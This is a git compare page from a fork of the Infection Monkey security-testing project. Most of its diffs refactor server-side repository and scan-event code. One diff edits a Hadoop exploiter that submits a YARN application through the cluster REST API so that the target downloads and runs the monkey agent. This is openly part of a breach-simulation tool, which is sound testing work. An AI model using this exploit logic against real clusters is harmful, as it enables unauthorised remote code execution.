forked from p15670423/monkey
Compare commits
13 Commits
develop
...
2269-updat
Author | SHA1 | Date |
---|---|---|
Mike Salvatore | 563957f9c2 | |
Mike Salvatore | b6a6295ae8 | |
Mike Salvatore | e876682d84 | |
Mike Salvatore | e77932f7d6 | |
Mike Salvatore | e1f32177e9 | |
Mike Salvatore | c4052bc5ad | |
Mike Salvatore | a7d7c1a787 | |
vakarisz | e54c950dc3 | |
vakarisz | d3c2d95a69 | |
vakarisz | c5c8bc1d2f | |
vakarisz | a96b82fa0f | |
vakarisz | a143d7206e | |
vakarisz | d0d37ce595 |
|
@ -29,7 +29,7 @@ Monkey on our [website](https://www.akamai.com/infectionmonkey).
|
||||||
For more information, or to apply, see the official job post:
|
For more information, or to apply, see the official job post:
|
||||||
- [Israel](https://akamaicareers.inflightcloud.com/jobdetails/aka_ext/028224?section=aka_ext&job=028224)
|
- [Israel](https://akamaicareers.inflightcloud.com/jobdetails/aka_ext/028224?section=aka_ext&job=028224)
|
||||||
|
|
||||||
test1111
|
|
||||||
|
|
||||||
## Screenshots
|
## Screenshots
|
||||||
|
|
||||||
|
|
|
@ -1,13 +0,0 @@
|
||||||
import json
|
|
||||||
data = {
|
|
||||||
'name' : 'myname',
|
|
||||||
'age' : 100,
|
|
||||||
}
|
|
||||||
# separators:是分隔符的意思,参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符,把:和,后面的空格都除去了.
|
|
||||||
# dumps 将python对象字典转换为json字符串
|
|
||||||
json_str = json.dumps(data, separators=(',', ':'))
|
|
||||||
print(type(json_str), json_str)
|
|
||||||
|
|
||||||
# loads 将json字符串转化为python对象字典
|
|
||||||
pyton_obj = json.loads(json_str)
|
|
||||||
print(type(pyton_obj), pyton_obj)
|
|
|
@ -5,20 +5,13 @@
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import json
|
import json
|
||||||
import logging
|
|
||||||
import posixpath
|
import posixpath
|
||||||
import random
|
import random
|
||||||
import string
|
import string
|
||||||
from time import time
|
|
||||||
|
|
||||||
import requests
|
import requests
|
||||||
|
|
||||||
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
|
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
|
||||||
from common.tags import (
|
|
||||||
T1105_ATTACK_TECHNIQUE_TAG,
|
|
||||||
T1203_ATTACK_TECHNIQUE_TAG,
|
|
||||||
T1210_ATTACK_TECHNIQUE_TAG,
|
|
||||||
)
|
|
||||||
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
|
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
|
||||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
|
@ -30,10 +23,6 @@ from infection_monkey.model import (
|
||||||
)
|
)
|
||||||
from infection_monkey.utils.commands import build_monkey_commandline
|
from infection_monkey.utils.commands import build_monkey_commandline
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
HADOOP_EXPLOITER_TAG = "hadoop-exploiter"
|
|
||||||
|
|
||||||
|
|
||||||
class HadoopExploiter(WebRCE):
|
class HadoopExploiter(WebRCE):
|
||||||
_EXPLOITED_SERVICE = "Hadoop"
|
_EXPLOITED_SERVICE = "Hadoop"
|
||||||
|
@ -43,43 +32,39 @@ class HadoopExploiter(WebRCE):
|
||||||
# Random string's length that's used for creating unique app name
|
# Random string's length that's used for creating unique app name
|
||||||
RAN_STR_LEN = 6
|
RAN_STR_LEN = 6
|
||||||
|
|
||||||
_EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
|
|
||||||
|
|
||||||
_PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
|
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
super(HadoopExploiter, self).__init__()
|
super(HadoopExploiter, self).__init__()
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
# Try to get potential urls
|
# Try to get exploitable url
|
||||||
potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
||||||
if not potential_urls:
|
self.add_vulnerable_urls(urls, True)
|
||||||
self.exploit_result.error_message = (
|
if not self.vulnerable_urls:
|
||||||
f"No potential exploitable urls has been found for {self.host}"
|
|
||||||
)
|
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
monkey_path_on_victim = get_agent_dst_path(self.host)
|
try:
|
||||||
|
monkey_path_on_victim = get_agent_dst_path(self.host)
|
||||||
|
except KeyError:
|
||||||
|
return self.exploit_result
|
||||||
|
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(
|
http_path, http_thread = HTTPTools.create_locked_transfer(
|
||||||
self.host, str(monkey_path_on_victim), self.agent_binary_repository
|
self.host, str(monkey_path_on_victim), self.agent_binary_repository
|
||||||
)
|
)
|
||||||
|
|
||||||
command = self._build_command(monkey_path_on_victim, http_path)
|
|
||||||
try:
|
try:
|
||||||
for url in potential_urls:
|
command = self._build_command(monkey_path_on_victim, http_path)
|
||||||
if self.exploit(url, command):
|
|
||||||
self.add_executed_cmd(command)
|
if self.exploit(self.vulnerable_urls[0], command):
|
||||||
self.exploit_result.exploitation_success = True
|
self.add_executed_cmd(command)
|
||||||
self.exploit_result.propagation_success = True
|
self.exploit_result.exploitation_success = True
|
||||||
break
|
self.exploit_result.propagation_success = True
|
||||||
finally:
|
finally:
|
||||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
def exploit(self, url: str, command: str):
|
def exploit(self, url, command):
|
||||||
if self._is_interrupted():
|
if self._is_interrupted():
|
||||||
self._set_interrupted()
|
self._set_interrupted()
|
||||||
return False
|
return False
|
||||||
|
@ -88,8 +73,8 @@ class HadoopExploiter(WebRCE):
|
||||||
resp = requests.post(
|
resp = requests.post(
|
||||||
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
|
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
|
||||||
)
|
)
|
||||||
resp_dict = json.loads(resp.content)
|
resp = json.loads(resp.content)
|
||||||
app_id = resp_dict["application-id"]
|
app_id = resp["application-id"]
|
||||||
|
|
||||||
# Create a random name for our application in YARN
|
# Create a random name for our application in YARN
|
||||||
# random.SystemRandom can block indefinitely in Linux
|
# random.SystemRandom can block indefinitely in Linux
|
||||||
|
@ -102,16 +87,10 @@ class HadoopExploiter(WebRCE):
|
||||||
self._set_interrupted()
|
self._set_interrupted()
|
||||||
return False
|
return False
|
||||||
|
|
||||||
timestamp = time()
|
|
||||||
resp = requests.post(
|
resp = requests.post(
|
||||||
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
|
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
|
||||||
)
|
)
|
||||||
|
return resp.status_code == 202
|
||||||
success = resp.status_code == 202
|
|
||||||
message = "" if success else f"Failed to exploit via {url}"
|
|
||||||
self._publish_exploitation_event(timestamp, success, error_message=message)
|
|
||||||
self._publish_propagation_event(timestamp, success, error_message=message)
|
|
||||||
return success
|
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
def check_if_exploitable(self, url):
|
||||||
try:
|
try:
|
||||||
|
|
|
@ -1,3 +1,4 @@
|
||||||
from .save_event_to_event_repository import save_event_to_event_repository
|
from .save_event_to_event_repository import save_event_to_event_repository
|
||||||
from .save_stolen_credentials_to_repository import save_stolen_credentials_to_repository
|
from .save_stolen_credentials_to_repository import save_stolen_credentials_to_repository
|
||||||
from .scan_event_handler import ScanEventHandler
|
from .scan_event_handler import ScanEventHandler
|
||||||
|
from .update_nodes_on_exploitation import update_nodes_on_exploitation
|
||||||
|
|
|
@ -0,0 +1,33 @@
|
||||||
|
from functools import lru_cache
|
||||||
|
from ipaddress import IPv4Address, IPv4Interface
|
||||||
|
|
||||||
|
from common.agent_events import AbstractAgentEvent
|
||||||
|
from common.types import AgentID, MachineID
|
||||||
|
from monkey_island.cc.models import Machine
|
||||||
|
from monkey_island.cc.repository import IAgentRepository, IMachineRepository, UnknownRecordError
|
||||||
|
|
||||||
|
|
||||||
|
class NodeUpdateFacade:
|
||||||
|
def __init__(self, agent_repository: IAgentRepository, machine_repository: IMachineRepository):
|
||||||
|
self._agent_repository = agent_repository
|
||||||
|
self._machine_repository = machine_repository
|
||||||
|
|
||||||
|
def get_or_create_target_machine(self, target: IPv4Address):
|
||||||
|
try:
|
||||||
|
target_machines = self._machine_repository.get_machines_by_ip(target)
|
||||||
|
return target_machines[0]
|
||||||
|
except UnknownRecordError:
|
||||||
|
machine = Machine(
|
||||||
|
id=self._machine_repository.get_new_id(),
|
||||||
|
network_interfaces=[IPv4Interface(target)],
|
||||||
|
)
|
||||||
|
self._machine_repository.upsert_machine(machine)
|
||||||
|
return machine
|
||||||
|
|
||||||
|
def get_event_source_machine(self, event: AbstractAgentEvent) -> Machine:
|
||||||
|
machine_id = self._get_machine_id_from_agent_id(event.source)
|
||||||
|
return self._machine_repository.get_machine_by_id(machine_id)
|
||||||
|
|
||||||
|
@lru_cache(maxsize=None)
|
||||||
|
def _get_machine_id_from_agent_id(self, agent_id: AgentID) -> MachineID:
|
||||||
|
return self._agent_repository.get_agent_by_id(agent_id).machine_id
|
|
@ -1,11 +1,10 @@
|
||||||
from ipaddress import IPv4Interface
|
|
||||||
from logging import getLogger
|
from logging import getLogger
|
||||||
from typing import Union
|
from typing import List, Union
|
||||||
|
|
||||||
from typing_extensions import TypeAlias
|
from typing_extensions import TypeAlias
|
||||||
|
|
||||||
from common.agent_events import PingScanEvent, TCPScanEvent
|
from common.agent_events import PingScanEvent, TCPScanEvent
|
||||||
from common.types import PortStatus, SocketAddress
|
from common.types import NetworkService, PortStatus, SocketAddress
|
||||||
from monkey_island.cc.models import CommunicationType, Machine, Node
|
from monkey_island.cc.models import CommunicationType, Machine, Node
|
||||||
from monkey_island.cc.repository import (
|
from monkey_island.cc.repository import (
|
||||||
IAgentRepository,
|
IAgentRepository,
|
||||||
|
@ -16,6 +15,8 @@ from monkey_island.cc.repository import (
|
||||||
UnknownRecordError,
|
UnknownRecordError,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
from .node_update_facade import NodeUpdateFacade
|
||||||
|
|
||||||
ScanEvent: TypeAlias = Union[PingScanEvent, TCPScanEvent]
|
ScanEvent: TypeAlias = Union[PingScanEvent, TCPScanEvent]
|
||||||
|
|
||||||
logger = getLogger(__name__)
|
logger = getLogger(__name__)
|
||||||
|
@ -32,6 +33,7 @@ class ScanEventHandler:
|
||||||
machine_repository: IMachineRepository,
|
machine_repository: IMachineRepository,
|
||||||
node_repository: INodeRepository,
|
node_repository: INodeRepository,
|
||||||
):
|
):
|
||||||
|
self._node_update_facade = NodeUpdateFacade(agent_repository, machine_repository)
|
||||||
self._agent_repository = agent_repository
|
self._agent_repository = agent_repository
|
||||||
self._machine_repository = machine_repository
|
self._machine_repository = machine_repository
|
||||||
self._node_repository = node_repository
|
self._node_repository = node_repository
|
||||||
|
@ -49,7 +51,7 @@ class ScanEventHandler:
|
||||||
logger.exception("Unable to process ping scan data")
|
logger.exception("Unable to process ping scan data")
|
||||||
|
|
||||||
def handle_tcp_scan_event(self, event: TCPScanEvent):
|
def handle_tcp_scan_event(self, event: TCPScanEvent):
|
||||||
num_open_ports = sum((1 for status in event.ports.values() if status == PortStatus.OPEN))
|
num_open_ports = len(self._get_open_ports(event))
|
||||||
|
|
||||||
if num_open_ports <= 0:
|
if num_open_ports <= 0:
|
||||||
return
|
return
|
||||||
|
@ -60,24 +62,21 @@ class ScanEventHandler:
|
||||||
|
|
||||||
self._update_nodes(target_machine, event)
|
self._update_nodes(target_machine, event)
|
||||||
self._update_tcp_connections(source_node, target_machine, event)
|
self._update_tcp_connections(source_node, target_machine, event)
|
||||||
|
self._update_network_services(target_machine, event)
|
||||||
except (RetrievalError, StorageError, UnknownRecordError):
|
except (RetrievalError, StorageError, UnknownRecordError):
|
||||||
logger.exception("Unable to process tcp scan data")
|
logger.exception("Unable to process tcp scan data")
|
||||||
|
|
||||||
def _get_target_machine(self, event: ScanEvent) -> Machine:
|
def _get_target_machine(self, event: ScanEvent) -> Machine:
|
||||||
try:
|
return self._node_update_facade.get_or_create_target_machine(event.target)
|
||||||
target_machines = self._machine_repository.get_machines_by_ip(event.target)
|
|
||||||
return target_machines[0]
|
|
||||||
except UnknownRecordError:
|
|
||||||
machine = Machine(
|
|
||||||
id=self._machine_repository.get_new_id(),
|
|
||||||
network_interfaces=[IPv4Interface(event.target)],
|
|
||||||
)
|
|
||||||
self._machine_repository.upsert_machine(machine)
|
|
||||||
return machine
|
|
||||||
|
|
||||||
def _get_source_node(self, event: ScanEvent) -> Node:
|
def _get_source_node(self, event: ScanEvent) -> Node:
|
||||||
machine = self._get_source_machine(event)
|
machine = self._get_source_machine(event)
|
||||||
return self._node_repository.get_node_by_machine_id(machine.id)
|
try:
|
||||||
|
node = self._node_repository.get_node_by_machine_id(machine.id)
|
||||||
|
except UnknownRecordError:
|
||||||
|
node = Node(machine_id=machine.id)
|
||||||
|
self._node_repository.upsert_node(node)
|
||||||
|
return node
|
||||||
|
|
||||||
def _get_source_machine(self, event: ScanEvent) -> Machine:
|
def _get_source_machine(self, event: ScanEvent) -> Machine:
|
||||||
agent = self._agent_repository.get_agent_by_id(event.source)
|
agent = self._agent_repository.get_agent_by_id(event.source)
|
||||||
|
@ -88,6 +87,17 @@ class ScanEventHandler:
|
||||||
machine.operating_system = event.os
|
machine.operating_system = event.os
|
||||||
self._machine_repository.upsert_machine(machine)
|
self._machine_repository.upsert_machine(machine)
|
||||||
|
|
||||||
|
def _update_network_services(self, target: Machine, event: TCPScanEvent):
|
||||||
|
network_services = {
|
||||||
|
SocketAddress(ip=event.target, port=port): NetworkService.UNKNOWN
|
||||||
|
for port in self._get_open_ports(event)
|
||||||
|
}
|
||||||
|
self._machine_repository.upsert_network_services(target.id, network_services)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _get_open_ports(event: TCPScanEvent) -> List[int]:
|
||||||
|
return [port for port, status in event.ports.items() if status == PortStatus.OPEN]
|
||||||
|
|
||||||
def _update_nodes(self, target_machine: Machine, event: ScanEvent):
|
def _update_nodes(self, target_machine: Machine, event: ScanEvent):
|
||||||
src_machine = self._get_source_machine(event)
|
src_machine = self._get_source_machine(event)
|
||||||
|
|
||||||
|
@ -97,7 +107,7 @@ class ScanEventHandler:
|
||||||
|
|
||||||
def _update_tcp_connections(self, src_node: Node, target_machine: Machine, event: TCPScanEvent):
|
def _update_tcp_connections(self, src_node: Node, target_machine: Machine, event: TCPScanEvent):
|
||||||
tcp_connections = set()
|
tcp_connections = set()
|
||||||
open_ports = (port for port, status in event.ports.items() if status == PortStatus.OPEN)
|
open_ports = self._get_open_ports(event)
|
||||||
for open_port in open_ports:
|
for open_port in open_ports:
|
||||||
socket_address = SocketAddress(ip=event.target, port=open_port)
|
socket_address = SocketAddress(ip=event.target, port=open_port)
|
||||||
tcp_connections.add(socket_address)
|
tcp_connections.add(socket_address)
|
||||||
|
|
|
@ -3,6 +3,7 @@ from ipaddress import IPv4Interface
|
||||||
from typing import Any, Dict, Mapping, Optional, Sequence
|
from typing import Any, Dict, Mapping, Optional, Sequence
|
||||||
|
|
||||||
from pydantic import Field, validator
|
from pydantic import Field, validator
|
||||||
|
from typing_extensions import TypeAlias
|
||||||
|
|
||||||
from common import OperatingSystem
|
from common import OperatingSystem
|
||||||
from common.base_models import MutableInfectionMonkeyBaseModel, MutableInfectionMonkeyModelConfig
|
from common.base_models import MutableInfectionMonkeyBaseModel, MutableInfectionMonkeyModelConfig
|
||||||
|
@ -11,6 +12,8 @@ from common.types import HardwareID, NetworkService, SocketAddress
|
||||||
|
|
||||||
from . import MachineID
|
from . import MachineID
|
||||||
|
|
||||||
|
NetworkServices: TypeAlias = Dict[SocketAddress, NetworkService]
|
||||||
|
|
||||||
|
|
||||||
def _serialize_network_services(machine_dict: Dict, *, default):
|
def _serialize_network_services(machine_dict: Dict, *, default):
|
||||||
machine_dict["network_services"] = {
|
machine_dict["network_services"] = {
|
||||||
|
@ -61,7 +64,7 @@ class Machine(MutableInfectionMonkeyBaseModel):
|
||||||
hostname: str = ""
|
hostname: str = ""
|
||||||
"""The hostname of the machine"""
|
"""The hostname of the machine"""
|
||||||
|
|
||||||
network_services: Mapping[SocketAddress, NetworkService] = Field(default_factory=dict)
|
network_services: NetworkServices = Field(default_factory=dict)
|
||||||
"""All network services found running on the machine"""
|
"""All network services found running on the machine"""
|
||||||
|
|
||||||
_make_immutable_sequence = validator("network_interfaces", pre=True, allow_reuse=True)(
|
_make_immutable_sequence = validator("network_interfaces", pre=True, allow_reuse=True)(
|
||||||
|
|
|
@ -24,7 +24,7 @@ class Node(MutableInfectionMonkeyBaseModel):
|
||||||
machine_id: MachineID = Field(..., allow_mutation=False)
|
machine_id: MachineID = Field(..., allow_mutation=False)
|
||||||
"""The MachineID of the node (source)"""
|
"""The MachineID of the node (source)"""
|
||||||
|
|
||||||
connections: NodeConnections
|
connections: NodeConnections = {}
|
||||||
"""All outbound connections from this node to other machines"""
|
"""All outbound connections from this node to other machines"""
|
||||||
|
|
||||||
tcp_connections: TCPConnections = {}
|
tcp_connections: TCPConnections = {}
|
||||||
|
|
|
@ -4,6 +4,7 @@ from typing import Sequence
|
||||||
|
|
||||||
from common.types import HardwareID
|
from common.types import HardwareID
|
||||||
from monkey_island.cc.models import Machine, MachineID
|
from monkey_island.cc.models import Machine, MachineID
|
||||||
|
from monkey_island.cc.models.machine import NetworkServices
|
||||||
|
|
||||||
|
|
||||||
class IMachineRepository(ABC):
|
class IMachineRepository(ABC):
|
||||||
|
@ -29,6 +30,16 @@ class IMachineRepository(ABC):
|
||||||
:raises StorageError: If an error occurs while attempting to store the `Machine`
|
:raises StorageError: If an error occurs while attempting to store the `Machine`
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
def upsert_network_services(self, machine_id: MachineID, services: NetworkServices):
|
||||||
|
"""
|
||||||
|
Add/update network services on the machine
|
||||||
|
:param machine_id: ID of machine with services to be updated
|
||||||
|
:param services: Network services to be added to machine model
|
||||||
|
:raises UnknownRecordError: If the Machine is not found
|
||||||
|
:raises StorageError: If an error occurs while attempting to add/store the services
|
||||||
|
"""
|
||||||
|
|
||||||
@abstractmethod
|
@abstractmethod
|
||||||
def get_machine_by_id(self, machine_id: MachineID) -> Machine:
|
def get_machine_by_id(self, machine_id: MachineID) -> Machine:
|
||||||
"""
|
"""
|
||||||
|
|
|
@ -44,6 +44,14 @@ class INodeRepository(ABC):
|
||||||
:raises RetrievalError: If an error occurs while attempting to retrieve the nodes
|
:raises RetrievalError: If an error occurs while attempting to retrieve the nodes
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
def upsert_node(self, node: Node):
|
||||||
|
"""
|
||||||
|
Update or insert Node model into the database
|
||||||
|
:param node: Node model to be added to the repository
|
||||||
|
:raises StorageError: If something went wrong when upserting the Node
|
||||||
|
"""
|
||||||
|
|
||||||
@abstractmethod
|
@abstractmethod
|
||||||
def get_node_by_machine_id(self, machine_id: MachineID) -> Node:
|
def get_node_by_machine_id(self, machine_id: MachineID) -> Node:
|
||||||
"""
|
"""
|
||||||
|
|
|
@ -7,8 +7,10 @@ from pymongo import MongoClient
|
||||||
from common.types import HardwareID
|
from common.types import HardwareID
|
||||||
from monkey_island.cc.models import Machine, MachineID
|
from monkey_island.cc.models import Machine, MachineID
|
||||||
|
|
||||||
|
from ..models.machine import NetworkServices
|
||||||
from . import IMachineRepository, RemovalError, RetrievalError, StorageError, UnknownRecordError
|
from . import IMachineRepository, RemovalError, RetrievalError, StorageError, UnknownRecordError
|
||||||
from .consts import MONGO_OBJECT_ID_KEY
|
from .consts import MONGO_OBJECT_ID_KEY
|
||||||
|
from .utils import DOT_REPLACEMENT, mongo_dot_decoder, mongo_dot_encoder
|
||||||
|
|
||||||
|
|
||||||
class MongoMachineRepository(IMachineRepository):
|
class MongoMachineRepository(IMachineRepository):
|
||||||
|
@ -32,26 +34,32 @@ class MongoMachineRepository(IMachineRepository):
|
||||||
|
|
||||||
def upsert_machine(self, machine: Machine):
|
def upsert_machine(self, machine: Machine):
|
||||||
try:
|
try:
|
||||||
|
machine_dict = mongo_dot_encoder(machine.dict(simplify=True))
|
||||||
result = self._machines_collection.replace_one(
|
result = self._machines_collection.replace_one(
|
||||||
{"id": machine.id}, machine.dict(simplify=True), upsert=True
|
{"id": machine.id}, machine_dict, upsert=True
|
||||||
)
|
)
|
||||||
except Exception as err:
|
except Exception as err:
|
||||||
raise StorageError(f'Error updating machine with ID "{machine.id}": {err}')
|
raise StorageError(f'Error updating machine with ID "{machine.id}": {err}')
|
||||||
|
|
||||||
if result.matched_count != 0 and result.modified_count != 1:
|
|
||||||
raise StorageError(
|
|
||||||
f'Error updating machine with ID "{machine.id}": Expected to update 1 machine, '
|
|
||||||
f"but {result.modified_count} were updated"
|
|
||||||
)
|
|
||||||
|
|
||||||
if result.matched_count == 0 and result.upserted_id is None:
|
if result.matched_count == 0 and result.upserted_id is None:
|
||||||
raise StorageError(
|
raise StorageError(
|
||||||
f'Error inserting machine with ID "{machine.id}": Expected to insert 1 machine, '
|
f'Error inserting machine with ID "{machine.id}": Expected to insert 1 machine, '
|
||||||
f"but no machines were inserted"
|
f"but no machines were inserted"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
def upsert_network_services(self, machine_id: MachineID, services: NetworkServices):
|
||||||
|
machine = self.get_machine_by_id(machine_id)
|
||||||
|
try:
|
||||||
|
machine.network_services.update(services)
|
||||||
|
self.upsert_machine(machine)
|
||||||
|
except Exception as err:
|
||||||
|
raise StorageError(f"Failed upserting the machine or adding services") from err
|
||||||
|
|
||||||
def get_machine_by_id(self, machine_id: MachineID) -> Machine:
|
def get_machine_by_id(self, machine_id: MachineID) -> Machine:
|
||||||
return self._find_one("id", machine_id)
|
machine = self._find_one("id", machine_id)
|
||||||
|
if not machine:
|
||||||
|
raise UnknownRecordError(f"Machine with id {machine_id} not found")
|
||||||
|
return machine
|
||||||
|
|
||||||
def get_machine_by_hardware_id(self, hardware_id: HardwareID) -> Machine:
|
def get_machine_by_hardware_id(self, hardware_id: HardwareID) -> Machine:
|
||||||
return self._find_one("hardware_id", hardware_id)
|
return self._find_one("hardware_id", hardware_id)
|
||||||
|
@ -67,6 +75,7 @@ class MongoMachineRepository(IMachineRepository):
|
||||||
if machine_dict is None:
|
if machine_dict is None:
|
||||||
raise UnknownRecordError(f'Unknown machine with "{key} == {search_value}"')
|
raise UnknownRecordError(f'Unknown machine with "{key} == {search_value}"')
|
||||||
|
|
||||||
|
machine_dict = mongo_dot_decoder(machine_dict)
|
||||||
return Machine(**machine_dict)
|
return Machine(**machine_dict)
|
||||||
|
|
||||||
def get_machines(self) -> Sequence[Machine]:
|
def get_machines(self) -> Sequence[Machine]:
|
||||||
|
@ -75,10 +84,10 @@ class MongoMachineRepository(IMachineRepository):
|
||||||
except Exception as err:
|
except Exception as err:
|
||||||
raise RetrievalError(f"Error retrieving machines: {err}")
|
raise RetrievalError(f"Error retrieving machines: {err}")
|
||||||
|
|
||||||
return [Machine(**m) for m in cursor]
|
return [Machine(**mongo_dot_decoder(m)) for m in cursor]
|
||||||
|
|
||||||
def get_machines_by_ip(self, ip: IPv4Address) -> Sequence[Machine]:
|
def get_machines_by_ip(self, ip: IPv4Address) -> Sequence[Machine]:
|
||||||
ip_regex = "^" + str(ip).replace(".", "\\.") + "\\/.*$"
|
ip_regex = "^" + str(ip).replace(".", DOT_REPLACEMENT) + "\\/.*$"
|
||||||
query = {"network_interfaces": {"$elemMatch": {"$regex": ip_regex}}}
|
query = {"network_interfaces": {"$elemMatch": {"$regex": ip_regex}}}
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -86,7 +95,7 @@ class MongoMachineRepository(IMachineRepository):
|
||||||
except Exception as err:
|
except Exception as err:
|
||||||
raise RetrievalError(f'Error retrieving machines with ip "{ip}": {err}')
|
raise RetrievalError(f'Error retrieving machines with ip "{ip}": {err}')
|
||||||
|
|
||||||
machines = [Machine(**m) for m in cursor]
|
machines = [Machine(**mongo_dot_decoder(m)) for m in cursor]
|
||||||
|
|
||||||
if len(machines) == 0:
|
if len(machines) == 0:
|
||||||
raise UnknownRecordError(f'No machines found with IP "{ip}"')
|
raise UnknownRecordError(f'No machines found with IP "{ip}"')
|
||||||
|
|
|
@ -30,7 +30,7 @@ class MongoNodeRepository(INodeRepository):
|
||||||
except Exception as err:
|
except Exception as err:
|
||||||
raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")
|
raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")
|
||||||
|
|
||||||
self._upsert_node(updated_node)
|
self.upsert_node(updated_node)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _add_connection_to_node(
|
def _add_connection_to_node(
|
||||||
|
@ -57,9 +57,9 @@ class MongoNodeRepository(INodeRepository):
|
||||||
node.tcp_connections[target] = tuple({*node.tcp_connections[target], *connections})
|
node.tcp_connections[target] = tuple({*node.tcp_connections[target], *connections})
|
||||||
else:
|
else:
|
||||||
node.tcp_connections[target] = connections
|
node.tcp_connections[target] = connections
|
||||||
self._upsert_node(node)
|
self.upsert_node(node)
|
||||||
|
|
||||||
def _upsert_node(self, node: Node):
|
def upsert_node(self, node: Node):
|
||||||
try:
|
try:
|
||||||
result = self._nodes_collection.replace_one(
|
result = self._nodes_collection.replace_one(
|
||||||
{SRC_FIELD_NAME: node.machine_id}, node.dict(simplify=True), upsert=True
|
{SRC_FIELD_NAME: node.machine_id}, node.dict(simplify=True), upsert=True
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
|
import json
|
||||||
import platform
|
import platform
|
||||||
from socket import gethostname
|
from socket import gethostname
|
||||||
|
from typing import Any, Mapping
|
||||||
from uuid import getnode
|
from uuid import getnode
|
||||||
|
|
||||||
from common import OperatingSystem
|
from common import OperatingSystem
|
||||||
from common.network.network_utils import get_network_interfaces
|
from common.network.network_utils import get_network_interfaces
|
||||||
from monkey_island.cc.models import Machine
|
from monkey_island.cc.models import Machine
|
||||||
|
|
||||||
from . import IMachineRepository, UnknownRecordError
|
from . import IMachineRepository, StorageError, UnknownRecordError
|
||||||
|
|
||||||
|
|
||||||
def initialize_machine_repository(machine_repository: IMachineRepository):
|
def initialize_machine_repository(machine_repository: IMachineRepository):
|
||||||
|
@ -33,3 +35,34 @@ def initialize_machine_repository(machine_repository: IMachineRepository):
|
||||||
hostname=gethostname(),
|
hostname=gethostname(),
|
||||||
)
|
)
|
||||||
machine_repository.upsert_machine(machine)
|
machine_repository.upsert_machine(machine)
|
||||||
|
|
||||||
|
|
||||||
|
DOT_REPLACEMENT = ",,,"
|
||||||
|
|
||||||
|
|
||||||
|
def mongo_dot_encoder(mapping: Mapping[str, Any]) -> Mapping[str, Any]:
|
||||||
|
"""
|
||||||
|
Mongo can't store keys with "." symbols (like IP's and filenames). This method
|
||||||
|
replaces all occurances of "." with ",,,"
|
||||||
|
:param mapping: Mapping to be converted to mongo compatible mapping
|
||||||
|
:return: Mongo compatible mapping
|
||||||
|
"""
|
||||||
|
mapping_json = json.dumps(mapping)
|
||||||
|
if DOT_REPLACEMENT in mapping_json:
|
||||||
|
raise StorageError(
|
||||||
|
f"Mapping {mapping} already contains {DOT_REPLACEMENT}."
|
||||||
|
f" Aborting the encoding procedure"
|
||||||
|
)
|
||||||
|
encoded_json = mapping_json.replace(".", DOT_REPLACEMENT)
|
||||||
|
return json.loads(encoded_json)
|
||||||
|
|
||||||
|
|
||||||
|
def mongo_dot_decoder(mapping: Mapping[str, Any]):
|
||||||
|
"""
|
||||||
|
Mongo can't store keys with "." symbols (like IP's and filenames). This method
|
||||||
|
reverts changes made by "mongo_dot_encoder" by replacing all occurances of ",,," with "."
|
||||||
|
:param mapping: Mapping to be converted from mongo compatible mapping to original mapping
|
||||||
|
:return: Original mapping
|
||||||
|
"""
|
||||||
|
report_as_json = json.dumps(mapping).replace(DOT_REPLACEMENT, ".")
|
||||||
|
return json.loads(report_as_json)
|
||||||
|
|
|
@ -0,0 +1,97 @@
|
||||||
|
from ipaddress import IPv4Address, IPv4Interface
|
||||||
|
from unittest.mock import MagicMock
|
||||||
|
from uuid import UUID
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from common.agent_events import AbstractAgentEvent
|
||||||
|
from common.types import AgentID, MachineID, SocketAddress
|
||||||
|
from monkey_island.cc.agent_event_handlers.node_update_facade import NodeUpdateFacade
|
||||||
|
from monkey_island.cc.models import Agent, Machine
|
||||||
|
from monkey_island.cc.repository import IAgentRepository, IMachineRepository, UnknownRecordError
|
||||||
|
|
||||||
|
|
||||||
|
class TestEvent(AbstractAgentEvent):
|
||||||
|
success: bool
|
||||||
|
|
||||||
|
|
||||||
|
SEED_ID = 99
|
||||||
|
IP_ADDRESS = IPv4Address("10.10.10.99")
|
